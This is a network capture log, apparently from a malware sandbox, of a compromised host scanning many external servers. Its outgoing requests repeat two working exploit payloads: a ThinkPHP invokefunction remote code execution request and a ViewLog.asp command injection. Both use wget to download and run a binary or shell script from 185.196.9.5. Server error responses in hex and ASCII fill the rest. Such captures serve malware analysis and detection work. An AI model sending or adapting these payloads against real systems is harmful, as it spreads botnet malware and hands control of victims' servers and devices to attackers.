Feb 25, 2024 19:05:22.217607021 CET	450	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:05:22 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.1.33 Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1136	192.168.2.15	48994	95.101.225.212	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:22.077414036 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:22.333849907 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:05:22 GMT Date: Sun, 25 Feb 2024 18:05:22 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 63 38 36 34 35 66 26 23 34 36 3b 31 37 30 38 38 38 34 33 32 32 26 23 34 36 3b 34 62 38 39 61 61 66 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.cc8645f.1708884322.4b89aafe</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1137	192.168.2.15	37806	95.101.210.168	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:22.216089010 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:22.411278963 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:05:22 GMT Date: Sun, 25 Feb 2024 18:05:22 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 36 30 62 31 35 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 33 32 32 26 23 34 36 3b 38 32 31 36 38 34 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.660b1502.1708884322.821684c</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1138	192.168.2.15	56362	112.17.97.124	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:22.216634035 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:22.606376886 CET	280	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:57 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1139	192.168.2.15	60514	95.173.137.61	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:22.255381107 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:22.560748100 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:22.795248032 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:05:22 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1140	192.168.2.15	51792	95.65.16.17	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:22.641822100 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1141	192.168.2.15	47100	94.120.228.139	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:22.646672010 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1142	192.168.2.15	35100	31.136.214.79	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:22.823684931 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:23.396749973 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:24.516709089 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:26.756879091 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:31.364929914 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:40.324552059 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1143	192.168.2.15	42290	62.83.144.168	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:22.842631102 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:23.044445038 CET	561	IN	HTTP/1.1 404 Not Found Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Content-Type Content-Type: text/html Content-Length: 345 Date: Sun, 25 Feb 2024 18:05:22 GMT Server: WebServer Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1144	192.168.2.15	42156	94.123.155.207	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:22.867899895 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1145	192.168.2.15	43740	94.123.30.112	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:23.657675028 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1146	192.168.2.15	36802	94.120.19.32	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:23.657733917 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1147	192.168.2.15	46544	31.44.133.19	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:23.657773018 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1148	192.168.2.15	54578	85.130.182.205	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:23.658361912 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:23.897063017 CET	129	IN	HTTP/1.1 302 Found Location: https://185.196.9.5:443 Content-Length: 0 Date: Sun, 25 Feb 2024 18:05:22 GMT Server: Server

Session ID	Source IP	Source Port	Destination IP	Destination Port
1149	192.168.2.15	46016	95.86.90.150	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:23.659852982 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:27.780702114 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1150	192.168.2.15	51946	95.183.113.19	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:23.685971975 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:23.944490910 CET	324	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 Date: Sun, 25 Feb 2024 18:05:23 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1151	192.168.2.15	39906	95.179.235.72	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:23.770991087 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:23.935781002 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.22.1 Date: Sun, 25 Feb 2024 18:05:23 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1152	192.168.2.15	39768	95.143.189.74	80

Timestamp	Bytes transferred	Direction	Data
